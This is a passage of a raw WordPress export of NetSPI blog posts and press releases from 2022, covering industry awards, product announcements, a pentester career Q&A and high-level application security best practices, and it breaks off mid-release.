“The award is certainly flattering and is really a reflection of the purpose we have as an organization along with our passion and pursuit of excellence. NetSPI has achieved this recognition due to our unwavering commitment to our clients and our team members. Our mission is to combine elite talent and technology to provide a differentiated experience and outcome for our clients, and we take pride in that recognition. This award is based on our work and reputation for things already done, and we will continue to build on this as we go forward.”
Chad Peterson, Managing Director
“Winning this awareness is a testament to all the hard work and dedication our teams have put in. From the consultants, technicians, sales, and strategy teams to marketing and leadership – everyone has had their hand in making NetSPI what we are, and it shows in the work that we are being honored for.
We have some of the most talented penetration testing experts in the industry. Without these people to shape the technology that we leverage – Resolve, AttackSim, and the Attack Surface Management platform – to streamline our work and allow our pentesting consultants to spend their valuable time identifying, verifying, and providing guidance on how to address findings for our clients, we would not be the company that we are today.”
Robert Richardson, VP of Enterprise Sales
“The secret is out. We’ve been delivering game changing quality and consistency for years, so it’s really exciting to see our growth and brand be recognized.
It’s a combination of our technology, people, and culture – the combination of those things creates consistency and quality in the depth of our services.”
Alex Jones, Chief Revenue Officer
“It is tough to truly articulate how much this award means to me. For me, this is the culmination of four years of incredibly hard work, so to see how far we have come as a company but then also be publicly recognized for it is such a testament to what we have accomplished thus far. Frankly, I feel like we are just getting started! I am such a small part in this puzzle, as my four years of hard work pale in comparison to the 10+ years of hard work so many of our technical and thought leaders have put in to build our incredible reputation.
What makes NetSPI the most innovative in pentesting is our unique combination of industry-leading technical talent, sophisticated use of bleeding edge technology, unrelenting focus on customer experience, and a culture that promotes and rewards the highest levels of moral and ethical standards.”
Nabil Hannan, Managing Director
“It’s a true feeling of pride knowing that I am part of an organization that is being recognized for excellence in our space. This award is a great validation of the work we have been doing as a company and that we are truly having an impact on the world of penetration testing.”
Connect With NetSPI at the 2022 RSA Conference
It’s clear that the team cannot wait to see many new and familiar faces this week at the conference and discuss how we have seen the industry “transform” over the past two years, and where it’s headed next.
Book a meeting with us to discuss penetration testing in-depth or explore our other services.
[post_title] => 2022 RSA Conference: What Makes Us the Most Innovative Pentesting Company?
[post_excerpt] => Learn what our team is looking forward to most at the 2022 RSA Conference and what being awarded the most innovative penetration testing company means to them.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => rsac-2022-penetration-testing-award
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:33
[post_modified_gmt] => 2023-01-23 21:10:33
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27877
[menu_order] => 131
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[36] => WP_Post Object
(
[ID] => 27870
[post_author] => 91
[post_date] => 2022-06-06 12:00:00
[post_date_gmt] => 2022-06-06 17:00:00
[post_content] =>
NetSPI honored in the coveted 10th Annual Global InfoSec Awards at the 2022 RSA Conference.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, was awarded "Most Innovative in Penetration Testing" from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine.
NetSPI represents the key criteria that CDM and the Global InfoSec Award judges look for in cybersecurity winners: understanding tomorrow’s threats, today, and innovating in unexpected ways that can help mitigate cyber risk and get one step ahead of the next breach.
Traditional pentesting has not kept pace with the realities of business agility and cybercriminal sophistication. NetSPI has revolutionized the Penetration Testing as a Service (PTaaS) delivery model to enable organizations to view penetration testing results in real time, scale to support innovation, orchestrate faster remediation, perform always-on continuous pentesting, and more.
NetSPI’s Resolve penetration testing platform, backed by its global team of expert pentesters, helps clients improve vulnerability management and remediation processes, better understand and reduce risk, manage the evolving attack surface, and leverages automation to enable manual pentesting to find business critical vulnerabilities that tools alone cannot uncover.
“We’re thrilled to be honored by Cyber Defense Magazine,” said Aaron Shilts, President and CEO of NetSPI. “Our technology-powered services are disrupting the penetration testing industry, and this recognition is a true testament to our global team’s unwavering dedication to delivering world-class penetration testing services.”
“NetSPI embodies what we look for in leading innovators within the cybersecurity industry,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine. “NetSPI’s platform driven, human delivered approach to offensive cybersecurity provides a unique opportunity for organizations to think strategically about their proactive security efforts, instead of viewing penetration testing as a check-the-box activity.”
For more information on NetSPI, visit the company website or speak with the company’s penetration testing experts at booth #4605 at RSA Conference 2022. Learn more about this year’s Global InfoSec Award winners in this full list here.
About NetSPI
NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world's five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About CDM InfoSec Awards
This is Cyber Defense Magazine’s tenth year of honoring InfoSec innovators from around the Globe. Our submission requirements are for any startup, early stage, later stage, or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com
About Cyber Defense Magazine
Cyber Defense Magazine is the premier source of cyber security news and information for InfoSec professions in business and government. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and special editions exclusively for the RSA Conferences. CDM is a proud member of the Cyber Defense Media Group. Learn more about us at https://www.cyberdefensemagazine.com and visit https://www.cyberdefensetv.com and https://www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives. Join a webinar at https://www.cyberdefensewebinars.com and realize that infosec knowledge is power.
[post_title] => NetSPI Named "Most Innovative in Penetration Testing" in the Global InfoSec Awards
[post_excerpt] => Read why NetSPI was selected as the most innovative pentesting company in the 2022 Global InfoSec Awards.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => most-innovative-pentesting-company-global-infosec-awards
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:34
[post_modified_gmt] => 2023-01-23 21:10:34
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27870
[menu_order] => 132
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[37] => WP_Post Object
(
[ID] => 27843
[post_author] => 91
[post_date] => 2022-06-01 08:00:00
[post_date_gmt] => 2022-06-01 13:00:00
[post_content] =>
Organizations leverage the platform-driven, human-delivered service to measure and continuously improve the efficacy of detective controls and MSSP coverage.
Minneapolis, MN – NetSPI, the leader in penetration testing and attack surface management, today announced new Breach and Attack Simulation (BAS) enhancements to meet increased market demand for improved threat detection. With the combination of the AttackSim cloud-native technology platform and hands-on counsel from NetSPI’s expert penetration testing team, organizations can continuously test their detective controls against real-world attack tactics, techniques, and procedures (TTPs).
According to NetSPI data, only 20% of common attack behaviors are caught by out-of-the-box detective controls (EDR, SIEM, MSSPs) – leaving organizations with a false sense of security. The updates to NetSPI’s Breach and Attack Simulation allow detection engineers to measure their ability to detect common adversary behaviors and ultimately prioritize detection development as well as investments.
Following the initial collaborative assessment with NetSPI’s experts, the AttackSim technology platform is provided to organizations for continuous testing and improvement. The platform features many new updates including:
Seamless use, regardless of skill level: An enhanced user experience (UX) and a refined user interface (UI) can be used by experts and novices alike.
New automated plays and playbooks: Detailed manual procedures for reproducing attacker behavior, as well as consistently updated security playbooks, allow organizations to better strengthen their security posture. With the latest updates, NetSPI has nearly 300 attack plays that can be used to test detective controls.
Enhanced reporting: Security teams now have additional data and metrics to work with, such as peer comparison, year-over-year reporting, and telemetry flow analysis. New reports that support programmatic, tactic, technique, and procedure (TTP) summary metrics are also now available.
“Indicators of Compromise have become less useful as the threat landscape evolves at a breakneck speed,” said Cody Chamberlain, Head of Product at NetSPI. “To stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. The NetSPI AttackSim platform, combined with the power of our skilled team of penetration testers, lets organizations continuously simulate real attack behavior, providing better insight into the efficacy of their detective controls.”
“Small and medium-sized organizations with limited personnel often rely on MSSPs to implement detections and operate similarly to a security operations center (SOC),” said Scott Sutherland, Senior Director, Adversary Simulation and Infrastructure Testing at NetSPI. “We built Breach and Attack Simulation not only to improve detections, but also to enable organizations to validate MSSP coverage and better understand the scope of their agreements.”
NetSPI will be demoing the AttackSim platform and its new capabilities during RSA Conference 2022 at booth #4605 in the North Expo Exhibit Hall. Schedule a meeting with the team.
NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI’s New Breach and Attack Simulation Enhancements Help Organizations Achieve Behavior-Based Threat Detection
[post_excerpt] => Learn how organizations can leverage breach and attack simulation for continuous detective control reviews, to evaluate MSSP coverage, and improve behavior-based threat detection.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => breach-and-attack-simulation-enhancements-threat-detection
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:34
[post_modified_gmt] => 2023-01-23 21:10:34
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27843
[menu_order] => 134
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[38] => WP_Post Object
(
[ID] => 27715
[post_author] => 91
[post_date] => 2022-04-28 13:27:28
[post_date_gmt] => 2022-04-28 18:27:28
[post_content] =>
The competitive business awards recognize entrepreneurs and leaders of high-growth companies who think big to succeed
Minneapolis, MN – Ernst & Young LLP (EY US) today announced that Aaron Shilts, CEO and President of NetSPI, was named an Entrepreneur Of The Year®2022 Heartland Award finalist. He is one of 28 finalists that have been selected by a panel of independent judges based on entrepreneurial spirit, purpose, growth, and impact – among other core contributions and attributes.
“What an honor to be listed next to some of the top business leaders in this region – arguably, some of the best in the country,” said Aaron. “But behind every great leader, is a team of even greater leaders. Without the support of every individual at NetSPI, we would not have achieved the high-growth, success, and innovation that we saw over the past two years. Together we’ve led NetSPI to become THE leader in offensive cybersecurity, helping to secure many of the world’s most prominent organizations.”
Regional award winners will be announced on June 9, 2022, at The Fillmore Minneapolis. The regional winners will then be considered by the National independent judging panel, and National awards will be presented in November at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2023.
“The 2022 Entrepreneur Of The Year finalists have shown us that ambition, courage, ingenuity and empathy are key to driving change,” said Dominic Iannazzo, Heartland Program Co-director. “They have a mindset that drives them to strive for more and an unwavering commitment to their companies, customers and communities.”
For over 35 years, EY US has celebrated the unstoppable entrepreneurs who are building a more equitable, sustainable, and prosperous world for all. The Entrepreneur Of The Year program has recognized more than 10,000 US executives since its inception in 1986.
###
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform driven, human delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About the Sponsors
Entrepreneur Of The Year is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind.
It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy.
About EY Private
As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private.
About EY
EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets.
Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform and operate.
Working across assurance, consulting, law, strategy, tax and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.
EY refers to the global organization, and may refer to one or more, of the member firms of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst & Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.
Ernst & Young LLP is a client-serving member firm of Ernst & Young Global Limited operating in the US.
Media Contacts: Tori Norris, NetSPI Director of Brand and Communications victoria.norris@netspi.com (630) 258-0277
[post_title] => EY Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year® 2022 Heartland Award Finalist
[post_excerpt] => Learn why Aaron Shilts is being recognized as a top Minnesota business leader alongside 28 other leaders and entrepreneurs in the Heartland region.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ey-entrepreneur-of-the-year-heartland-2022-aaron-shilts
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:40
[post_modified_gmt] => 2023-01-23 21:10:40
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27715
[menu_order] => 148
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[39] => WP_Post Object
(
[ID] => 27690
[post_author] => 91
[post_date] => 2022-04-26 07:00:00
[post_date_gmt] => 2022-04-26 12:00:00
[post_content] =>
At NetSPI, we invest heavily in our processes and technology to continuously perform high-quality penetration testing services for our clients. But ask any of our clients and they’ll tell you that the greatest quality that sets NetSPI apart from other pentesting vendors is our people – arguably the greatest and most important investment we can make.
It’s no secret that the cybersecurity and technology industry is experiencing 0% unemployment rates. And the competition is fierce for qualified talent that is not only technical but also understands the implications of cybersecurity.
Case-in-point: NetSPI recently attended the Secure World Boston cybersecurity event. In one session, the presenter asked the room of more than 50 CISOs and other security leaders to raise their hand if they had open cybersecurity positions that they were struggling to fill. Nearly every single hand went up in the room.
One way NetSPI is investing and bringing in new and qualified talent is the NetSPI University (NetSPI U) program. This penetration testing training program is specifically for entry-level talent looking to begin their career in cybersecurity.
Since its inception in 2018, 83% of all NetSPI U “graduates” have continued their careers at NetSPI today – many of which are now in leadership positions.
This competitive training program is available in Minneapolis, Portland (OR), Lehi, and Pune. You join as an Associate Security Consultant (or remote depending on the situation) and receive hands-on penetration testing training focused on NetSPI’s proven testing methodology. Not to mention the competitive benefits and opportunities to be mentored by some of the best talent in cybersecurity. [To view our open pentesting jobs, visit our careers page]
To share a first-hand perspective on what it’s like to become a pentester, in this blog, we asked four NetSPI U alumni to share their experiences getting into and working in the pentesting industry.
What did you wish you knew before you transitioned into cybersecurity?
Karin Knapp, Security Consultant (NetSPI U Class of 2021):
“I wish I had known more about a career in cybersecurity while in school. With limited experience in cybersecurity before I applied to NetSPI U, I wish I had taken more electives that would've been more applicable to my current role instead of what I thought I wanted to do before I graduated.”
Matt Ostrom, Managing Consultant (NetSPI U Class of 2018):
“Pentesting is a team job. There is no room, nor should there be room for ‘rockstars’.”
Marissa Allen, Security Consultant II (NetSPI U Class of 2020):
“I wish I had known more certainly what cybersecurity career path I wanted to take. Everything is interesting, and it can take a while to narrow down your interests in the field given there are so many paths you can take.”
Sam Horvath, Technical Client Director (NetSPI U Class of 2018):
“Ignorance is bliss – once you know how insecure most systems are, you’ll be perpetually ‘paranoid’ to some degree.”
What is one piece of advice you’d give to someone who wants to get started in pentesting?
Karin:
“Take a look at websites designed to help you practice your pentesting skills like PortSwigger, HacktheBox, or TryHackMe. These are great ways to familiarize yourself with the basics of pentesting with hands-on, guided practice.”
Matt:
“Start gathering knowledge however you can. Whether that be through reading books or blogs, setting up your home lab of virtual machines – in a cloud environment or something like VirtualBox – testing vulnerable web applications, etc. Every little bit helps.”
Marissa:
“I think the best advice I can give is don’t be afraid to ask questions. There is a ton of information out there, and it can be difficult to sort through. There are many great sites that you can learn new skills from and people that will be willing to guide you if you reach out.”
Sam:
“Start meditating and/or doing intense cardio daily. Being able to put your brain in a calm space at the end of the day after exhausting your critical thinking/problem-solving centers is the key to rejuvenation and rest.”
What characteristics make a great pentester? Why?
Karin:
“Having a passion to always want to learn more about cybersecurity and pentesting is probably the best characteristic in my opinion. The ability to get creative and think outside of the box, and to not give up on difficult problems is also super valuable.”
Matt:
“First, someone who is determined to succeed. Sometimes, we’ll have to go through 99 different failures on exploiting a vulnerability before finding the one that works. Second, someone who loves learning. The cybersecurity industry is constantly changing and keeping pace with those changes is important. And lastly, someone who genuinely wants to make a difference. The work we do is incredibly important, and I feel like our work matters in keeping our clients safe.”
Marissa:
“If you like research, puzzles, and problem solving, then you've got this. You’ll come across areas in your penetration tests where you will need to dig into a problem. If you have an investigative personality, then you have the tenacity to go down the rabbit hole and find out if there is a vulnerability or not.”
Sam:
“Perseverance. Cracking the hardest problems and puzzles means you can’t get discouraged easily. 99% of people won’t get it on the first try, and that’s okay.”
What was the most rewarding/beneficial part of your NetSPI U experience?
Karin:
“I realized shortly before NetSPI U that I wanted a career in cybersecurity, but I thought I would have to go back to school to be able to get a job in the field. NetSPI U taught me everything that I needed to know and helped me build a solid foundation to be a successful pentester. In addition, I got to meet some awesome people such as those from my NetSPI U class and people who were my mentors in the program. They are the reason I look forward to coming into the office even a year after I ’graduated’.”
Matt:
“NetSPI U gives people the opportunity to break into the cybersecurity industry. The idea/concept of the NetSPI U program is a rarity. Being able to go from having a little bit of cybersecurity experience to feeling like I’m confident and ready to start executing on client projects after the program was, and continues to be, invaluable. Additionally, learning from people who have spent years in the industry was crucial. The depth of knowledge they were able to share during the program is the reason why it keeps succeeding and producing stellar pentesters.”
Marissa:
“NetSPI U gave me the knowledge and tools to succeed in my career. The program helps future pentesters succeed in that aspect by pairing them with a seasoned pentester as their mentor to provide guidance and answer any questions. It helped me better understand the breadth of work being performed. The program ultimately enabled me to figure out which direction I wanted to grow in my career.”
Sam:
“Learning that I had the ability and the drive to develop and succeed in the information security space was a validation of years of work in learning the basics of computer science. Finding a fantastic set of colleagues to learn, grow, and develop friendships within that process was just a bonus.”
The Future of Penetration Testing
A career in cybersecurity is a lucrative and rewarding one to get into in the foreseeable future. As cybercrime continues to be on the rise, companies will only continue to invest in services such as penetration testing. Becoming a pentester is not for the faint of heart, but if you have the perseverance to see a project to the end like how Karin, Matt, Marissa, and Sam described, penetration testing could be for you.
[post_title] => Getting Started as a Pentester: Cybersecurity Career Q&A
[post_excerpt] => NetSPI U alumni share their experience breaking into a career in cybersecurity and advice on how to get started as a pentester.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => cybersecurity-career-getting-started-as-a-pentester
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:41
[post_modified_gmt] => 2023-01-23 21:10:41
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27690
[menu_order] => 151
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[40] => WP_Post Object
(
[ID] => 27576
[post_author] => 91
[post_date] => 2022-03-30 10:49:00
[post_date_gmt] => 2022-03-30 15:49:00
[post_content] =>
On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era. Preview the article below, or read the full article online.
+ + +
For an increasing number of organizations, the explosion in attack surfaces has reached unmanageable levels amid the COVID-19 pandemic and the widespread adoption of cloud services. In fact, research shows seven in 10 organizations have been compromised by an unknown or unmanaged asset.
As remote working has grown more popular during the pandemic, environments that sprawl across on-premises and cloud environments have expanded enterprise attack surfaces to the point where they can’t be secured through traditional IT security approaches alone.
NetSPI Brings Penetration Testing to the ASM Market
As the need for ASM solutions increases, many security vendors are beginning to move into the space. One such provider is NetSPI, a penetration testing-as-as-service provider that’s raised $100 million in funding to date, who last month launched a new ASM tool that incorporates human penetration testing.
NetSPI’s solution automatically scans attack surface assets and alerts users to high-risk exposure, while NetSPI’s internal team evaluates the risk posed by discovered issues and provides the organization with guidance on how to remediate them.
The use of human penetration testing is unique in the market, and enables organizations to benefit from automated asset scanning alongside the rich risk insights of an experience penetration testing team, who can identify what threats a risk poses in a way that automated solutions cannot.
[post_title] => VentureBeat: What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era
[post_excerpt] => On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => venturebeat-whats-happening-in-the-attack-surface-market
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:46
[post_modified_gmt] => 2023-01-23 21:10:46
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27576
[menu_order] => 164
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[41] => WP_Post Object
(
[ID] => 27549
[post_author] => 91
[post_date] => 2022-03-29 07:00:00
[post_date_gmt] => 2022-03-29 12:00:00
[post_content] =>
Siloes still exist in cybersecurity, where related functions and activities operate asynchronously with other parts of the organization. This is especially true with application security.
Various tests occur throughout the software development life cycle (SDLC), but they often lack context or are not in sync with other security activities, leaving organizations with gaps in coverage and a narrow view of their AppSec program.
To help change the way we approach application security testing today, three Appsec experts came together to discuss this topic in the webinar, Application Security In Depth: Understanding The Three Layers Of AppSec Testing. In this blog, we’ll share key takeaways from the discussion, which features Moshe Zioni, VP of Security Research at Apiiro; Nabil Hannan, Managing Director at NetSPI; and Samir Sherif, CISO at Imperva.
Why Context is Key During Application Security Testing
Contextual data is important. It helps organizations understand their SDLC through a broad lens and assists in prioritization of workflows and next steps. Not all vulnerabilities identified will be fixed immediately, and context is key to remediating those that pose the highest risk to the business first and fastest.
Moshe shares the following five different contextual triggers security leaders should pay close attention to in the SDLC.
Five Contextual Triggers to Leverage in the SDLC
Design: At the design stage, prioritize according to what threat model sessions you’d like to have. If there are several designs going through an agile development life cycle, prioritize that by balancing between the capacity we have as security practitioners to the actual deployment. This stage is also important for triggering contextual compliance review. If something is required for compliance and you didn’t prepare for it, this will costly and difficult to go back and implement.
Branch: After a pull request, you should have context around the code itself. First, analyze the code. This can be accomplished by a review or any automatic tool to enrich the data and provide us with data for the code itself. Through this context point, you can get multiple triggers according to workflows, how lean you want to get, and what priority you have for the commit itself. If you have a commit, which is highly prioritized in terms of sensitive data or a new developer, these context points create a weighing system to help automate the risk questionnaire and code governance. Once the automation is developed, you’ll have some cadence and governance rules for when to trigger each point instead of triggering everything.
Repository: At the repository level, you gain context about the repository, what kind of business impacts we will have for the application, what information passes through the application, and who is the customer. These points provide you with a coherent view of what needs to be done to secure your application. This is especially true if you need to have compliance rules. The repository is not to be overlooked and should have triggers and workflows.
CI/CD: The last point of the coding journey is the CI/CD system, or any integration and deployment processes. CI/CD is fluent, so there will be cycles going on throughout the organization. There should also be a lean and safe process for the CI/CD itself. Integrity and provenance for the CI/CD are important to have in terms of automation – as well as putting in place integration for integrity checks across the CI/CD life cycle.
Production: Before production, you should have another set of eyes look at the information for anything that looks suspicious.
Along with the context points and material changes, Moshe explains that “all of this comes together to a create a complete picture and mission, which is an ongoing cycle that doesn’t disrupt and interrupt the deployment process but gives you confidence on what kind of design and code you’re going to push to the cloud.”
Best Practices for Application Penetration Testing and Secure Code Review
Many different application security testing activities are completed throughout the SDLC, but penetration testing and secure code review are two of the most common and effective.
A larger concern, however, is that organizations struggle to optimize the results of these due to a lack of clarity on the results they want to achieve. Below are five best practices organizations can implement to optimize these tests.
Five Best Practices for Application Penetration Testing
Determine your business objectives. Organizations need to have a clear understanding of their business objectives and how they will make money. This will aid in building a proper application security roadmap and help organizations allocate resources and identify which areas to focus on.
Contextualize the vulnerabilities. Don’t just perform a security test, fix the vulnerabilities identified. This means understanding the vulnerabilities, contextualizing them based on the business risks, and figuring out which ones to remediate first.
Acquire buy-in from finance and risk leadership. Gaining support from finance, the Chief Compliance Officer, and other risk leaders and partners will enable organizations to perform testing on a regular cadence with the appropriate resources and budget for testing.
Perform proper threat modeling and design level analysis. Then, utilize the results to determine new and creative ways that attackers may be trying to gain access to company-wide assets or software that can’t be derived from regular pentesting.
Invest in continuous pentesting. Point-in-time testing is no longer sufficient if organizations want to protect their software and assets. Instead, it’s time to invest in continuous pentesting to keep up with the rate of change organizations face today.
One of the earliest times to detect a vulnerability is when the code is being written. Nabil shared this advice on how to start, “From a secure code review perspective, make sure you start aligning different tooling technology and code review activities with your software development cadence so that they are in lockstep in how they’re performed.”
Here are six additional best practices for secure code review.
Six Best Practices When Performing a Secure Code Review
Don’t get complacent. Organizations should be rotating the people who are reviewing source code over time, so everyone is immersed in devising creative ways to discover and fix vulnerabilities.
Build a methodology for code review. Create a champions program where developers are being trained to write secure code from the get-go. Then reward them for their efforts.
Transparency is key. Similar to the pentesting best practice above, organizations need to make sure they’re involving folks in leadership and other areas. This means explaining the need for security testing at the code level and how tooling, manual reviews, and automation are helpful with the development process and help build the software securely.
Prioritize onboarding and scan frequency. Organizations should be testing the right assets, the right applications, and at the right frequency and key timeframe.
Provide the proper training: Determine how to deal with the different bugs and vulnerabilities that were discovered. This is where it’s important that developers are equipped with the right training and education to fix these vulnerabilities. Another thing to consider is to gamify training so that folks can consume remediation guidance in bite-sized pieces.
Measure and Improve: Aim for continuous improvement. To accomplish this, organizations need to ensure they’re capturing key metrics and evaluating remediation rates. Are there vulnerabilities that keep recurring? Are developers writing better quality code over time? Are they able to abstract out certain security controls and put them into a secure development framework to help you reduce the cost, time, and effort it takes to fix the vulnerabilities?
Want to read more on secure code review? Check out these blog posts:
Solutions to Consider in the Implementation Journey
In application security, risk is one of the key drivers in delivering effective solutions for your application security program. “At the end of the day, it’s really about risk. How you manage risk and how you manage resiliency for your solutions. Not only from the AppSec perspective but also from the perspective of running your business and supporting the business that you’re in today,” shared Samir.
Samir explained that the three biggest drivers for security testing include:
How well am I protecting customer data?
How effectively am I building resilience for the technologies that I am providing as a service to customers?
How well do all the different capabilities from infrastructure security to monitoring solutions interplay with each other in application security?
What matters most in application security? According to Samir, there isn’t a single solution. We need to have a comprehensive view across the whole environment. Here, Samir shares examples of solution capabilities he recommends that security teams must implement – especially if you are selling or servicing solutions to your customers.
Awareness and Education
In-App Protection
Advanced Solutions
Code Analysis
Perimeter Protection
Proactive Solutions
Awareness, education, and code analysis will continue to evolve. Adversaries are always changing the game when it comes to finding vulnerabilities given the popularity of third-party and open-source components. There is always a new need to look at different capabilities based on this risk context. Solutions that are not only advanced but practical will be increasingly important.
Samir continued, “Shift left-to-right is critical.” To measure the application security program, organizations need to look at the SDLC from one end to the other. From different contexts – how they develop and train their engineers to what they’re seeing on the infrastructure side with solutions that provide visibility into how they’re deploying and the types of attack patterns that target their applications.
Understanding the interplay between these capabilities will help organizations understand what to address and prioritize to drive the effectiveness of their application security program.
A Layered Approach to Application Security Testing
Using the strategies discussed in this blog post and in the webinar, you’ll be able to implement a layered approach to AppSec that will help you build a world-class AppSec program. It starts with learning how to incorporate a risk context across the SDLC, then determining the key timeframes to implement application security testing and understanding how your solution capabilities interplay with one another.
[post_title] => How to Build a Layered Approach to Application Security Testing
[post_excerpt] => Learn best practices from top AppSec experts to help you build a world-class application security testing program.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => how-to-build-a-layered-approach-to-application-security-testing
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:47
[post_modified_gmt] => 2023-01-23 21:10:47
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27549
[menu_order] => 165
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[42] => WP_Post Object
(
[ID] => 27377
[post_author] => 91
[post_date] => 2022-02-22 08:05:00
[post_date_gmt] => 2022-02-22 14:05:00
[post_content] =>
The offering leverages innovative technology and expert pentesters to help organizations discover and secure all assets on the external attack surface.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing, today introduced Attack Surface Management to help secure the expanding, global attack surface. The platform delivers continuous pentesting backed by NetSPI’s global security testing team to help organizations inventory known and unknown internet-facing assets, identify exposures, and prioritize critical risks to their business.
According to Gartner’s Emerging Technologies: Critical Insights for External Attack Surface Management report, analysts recommend attack surface management implementation “as part of a broader, enterprise-wide vulnerability and threat management effort, where known and unknown risks, vulnerabilities and assets are handled as part of a concerted and integrated strategy.”
Attack Surface Management is a core component of NetSPI’s Penetration Testing as a Service (PTaaS) delivery model. It complements the company’s established Penetration Testing and Adversary Simulation technology-powered services to provide an integrated, full suite of offensive security solutions for its customers.
“You don’t know what you don’t know, and what you don’t know can hurt you,” said Travis Hoyt, Chief Technology Officer at NetSPI. “What we have built here is a comprehensive solution to shadow IT and asset management challenges. Attack Surface Management provides an opportunity for organizations to continuously enhance their security posture, improve their penetration testing strategies, and ultimately reduce the probability and impact of a costly cyberattack.”
https://youtu.be/ElP3hKWc55E
Key capabilities of NetSPI’s Attack Surface Management include:
